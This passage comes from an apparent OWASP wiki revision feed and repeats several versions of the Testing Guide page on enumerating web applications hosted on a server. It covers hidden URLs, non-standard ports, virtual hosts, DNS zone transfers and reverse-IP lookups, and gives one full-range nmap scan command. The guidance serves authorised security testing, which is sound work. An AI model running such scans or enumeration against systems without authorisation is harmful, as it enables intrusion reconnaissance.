If you don’t know a name server, you may look up ''whois'' information about the given IP address, and try to contact the name servers listed by whois, and request a zone transfer as said before.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic name maps, which is not granted.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to DNS zone transfer, but relies on web-based services which allow to perform name-based searched on DNS. One such a service is the ''Netcraft Search DNS'' service, available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com''. Then you will check whether the names you obtained are pertaining to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There is a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered the most information you can with the previous techniques, you can rely on search engines to possibly refine and increment your analysis. This may yield evidence of additional symbolic names belonging to your target, or applications accessible via non-obvious URLs.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for Topic X vulnerabilities:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
== References ==&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &amp;lt;br&amp;gt;&lt;br /&gt;
[2] nmap, http://www.insecure.org &amp;lt;br&amp;gt;&lt;br /&gt;
[3] Nessus Vulnerability Scanner, http://www.nessus.org &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
DNS lookup tools such as ''nslookup'', ''dig'' or similar. &amp;lt;br&amp;gt;&lt;br /&gt;
Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &amp;lt;br&amp;gt;&lt;br /&gt;
Search engines (Google, and other major engines). &amp;lt;br&amp;gt;&lt;br /&gt;
Specialized DNS-related web-based search service: see text.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11830</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11830"/>
				<updated>2006-11-06T08:58:56Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Description of the Issue */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step for testing vulnerabilities in a Web presence is to find out which particular applications are hosted on a Web Server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many different applications, in fact, have known vulnerabilities and known attack strategies than can be exploited in order to gain remote control and/or data exploitation.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition to this many applications are often hosted on a particular web server without reference from the main website: this is true for internal and/or extranet website which could be misconfigured or not updated due to the perception they're used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
In addition to this many application use common path for administrative interfaces which can be used to guess or bruteforce administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is loosing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes you, as a security professional, are given a set of IP addresses (or maybe just one) as a target to test. No other knowledge. It is arguable that this setting is more akin to a pentest-type engagement, but in any case it is expected that such an assignment would test all web applications accessible through this target (and possibly other things...). The problem is, the given IP address hosts an http service on port 80, but if you access it specifying the IP address (which is all you know) it reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. But that system could &amp;quot;hide&amp;quot; a bunch of web applications, associated to unrelated symbolic (DNS) names. Obviously the extent of your analysis is deeply affected by the fact that you test the applications, or you do not - because you don't notice them, or you notice only SOME of them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed out a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e. it could omit some symbolic names – and the client might not even being aware of that! (this is more likely to happen in large organizations).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may consist also of a set of DNS symbolic names, or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be the most comprehensive in scope, i.e. it should, first of all, identify all the applications accessible through the given target. In the following we will examine a few techniques that can be employed to achieve this goal.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated to three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case the URL http://www.example.com/ would not be associated to a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. There is usually no need to publish web applications in this way, unless you don’t want them to be accessible in a standard way, and you are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, but that their existence and location is not explicitly advertised.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows to associate a single IP address to one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated to DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (actually, it is not necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be reflected to serve different content by using so called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no way to full-proof ascertain the existence of non-standard-named web applications. Being non-standard, there is no magic recipe handing them out. However, we may employ a couple of criteria which may aid in their quest.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Our first hope is that these application might be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'' we could, for example, do a bit of googling using the ''site'' operator and examining the result of a query for “site: www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which might be likely candidates for non-published applications. For example, a web mail front end might be accessible from https://www.example.com/webmail, while this URL could not be referenced anywhere (after all, employees would know where the webmail application is located, while there is no reason to tell this information to outsiders by publishing it onto the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example: A Tomcat administrative interface), and yet not being referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) could yield back some results. Vulnerability scanners may help with this respect.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''nmap –P0 –sT –sV –p1-65535 192.168.1.100''&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
It is sufficient to examine the output and looking for http or the indication of SSL-wrapped services (which should be probed to confirm they are https).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – with respect to nmap – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is a number of techniques which may be used to identify DNS names associated to a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is nowadays of limited usage, given the fact that zone transfers are largely not honored by DNS servers, but it is worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, we must determine the name server serving ''x.y.z.t''. Actually, matters get complicated because there could be many such servers. Maybe you know a name server because it was given as part of the target to be assessed (let it be ''dns.example.com''). You may query ''dns.example.com'' by means of tools such as ''nslookup'' or ''dig'' and, if you are lucky, you may get back a list of the DNS entries for domain ''example.com''. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated. &amp;lt;br&amp;gt;&lt;br /&gt;
If you don’t know a name server, you may look up ''whois'' information about the given IP address, and try to contact the name servers listed by whois, and request a zone transfer as said before.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic name maps, which is not granted.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to DNS zone transfer, but relies on web-based services which allow to perform name-based searched on DNS. One such a service is the ''Netcraft Search DNS'' service, available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com''. Then you will check whether the names you obtained are pertaining to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There is a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered the most information you can with the previous techniques, you can rely on search engines to possibly refine and increment your analysis. This may yield evidence of additional symbolic names belonging to your target, or applications accessible via non-obvious URLs.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for Topic X vulnerabilities:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
== References ==&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &amp;lt;br&amp;gt;&lt;br /&gt;
[2] nmap, http://www.insecure.org &amp;lt;br&amp;gt;&lt;br /&gt;
[3] Nessus Vulnerability Scanner, http://www.nessus.org &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
DNS lookup tools such as ''nslookup'', ''dig'' or similar. &amp;lt;br&amp;gt;&lt;br /&gt;
Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &amp;lt;br&amp;gt;&lt;br /&gt;
Search engines (Google, and other major engines). &amp;lt;br&amp;gt;&lt;br /&gt;
Specialized DNS-related web-based search service: see text.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11829</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11829"/>
				<updated>2006-11-06T08:58:18Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* References */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step for testing vulnerabilities in a Web presence is to find out which particular applications are hosted on a Web Server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many different applications, in fact, have known vulnerabilities and known attack strategies than can be exploited in order to gain remote control and/or data exploitation.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition to this many applications are often hosted on a particular web server without reference from the main website: this is true for internal and/or extranet website which could be misconfigured or not updated due to the perception they're used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
In addition to this many application use common path for administrative interfaces which can be used to guess or bruteforce administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is loosing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes you, as a security professional, are given a set of IP addresses (or maybe just one) as a target to test. No other knowledge. It is arguable that this setting is more akin to a pentest-type engagement, but in any case it is expected that such an assignment would test all web applications accessible through this target (and possibly other things...). The problem is, the given IP address hosts an http service on port 80, but if you access it specifying the IP address (which is all you know) it reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. But that system could &amp;quot;hide&amp;quot; a bunch of web applications, associated to unrelated symbolic (DNS) names. Obviously the extent of your analysis is deeply affected by the fact that you test the applications, or you do not - because you don't notice them, or you notice only SOME of them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed out a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e. it could omit some symbolic names – and the client might not even being aware of that! (this is more likely to happen in large organizations).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may consist also of a set of DNS symbolic names, or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be the most comprehensive in scope, i.e. it should, first of all, identify all the applications accessible through the given target. In the following we will examine a few techniques that can be employed to achieve this goal.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated to three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case the URL http://www.example.com/ would not be associated to a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. There is usually no need to publish web applications in this way, unless you don’t want them to be accessible in a standard way, and you are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, but that their existence and location is not explicitly advertised.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows to associate a single IP address to one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated to DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (actually, it is not necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be reflected to serve different content by using so called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no way to full-proof ascertain the existence of non-standard-named web applications. Being non-standard, there is no magic recipe handing them out. However, we may employ a couple of criteria which may aid in their quest.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Our first hope is that these application might be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'' we could, for example, do a bit of googling using the ''site'' operator and examining the result of a query for “site: www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which might be likely candidates for non-published applications. For example, a web mail front end might be accessible from https://www.example.com/webmail, while this URL could not be referenced anywhere (after all, employees would know where the webmail application is located, while there is no reason to tell this information to outsiders by publishing it onto the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example: A Tomcat administrative interface), and yet not being referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) could yield back some results. Vulnerability scanners may help with this respect.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''nmap –P0 –sT –sV –p1-65535 192.168.1.100''&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
It is sufficient to examine the output and looking for http or the indication of SSL-wrapped services (which should be probed to confirm they are https).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – with respect to nmap – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is a number of techniques which may be used to identify DNS names associated to a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is nowadays of limited usage, given the fact that zone transfers are largely not honored by DNS servers, but it is worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, we must determine the name server serving ''x.y.z.t''. Actually, matters get complicated because there could be many such servers. Maybe you know a name server because it was given as part of the target to be assessed (let it be ''dns.example.com''). You may query ''dns.example.com'' by means of tools such as ''nslookup'' or ''dig'' and, if you are lucky, you may get back a list of the DNS entries for domain ''example.com''. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated. &amp;lt;br&amp;gt;&lt;br /&gt;
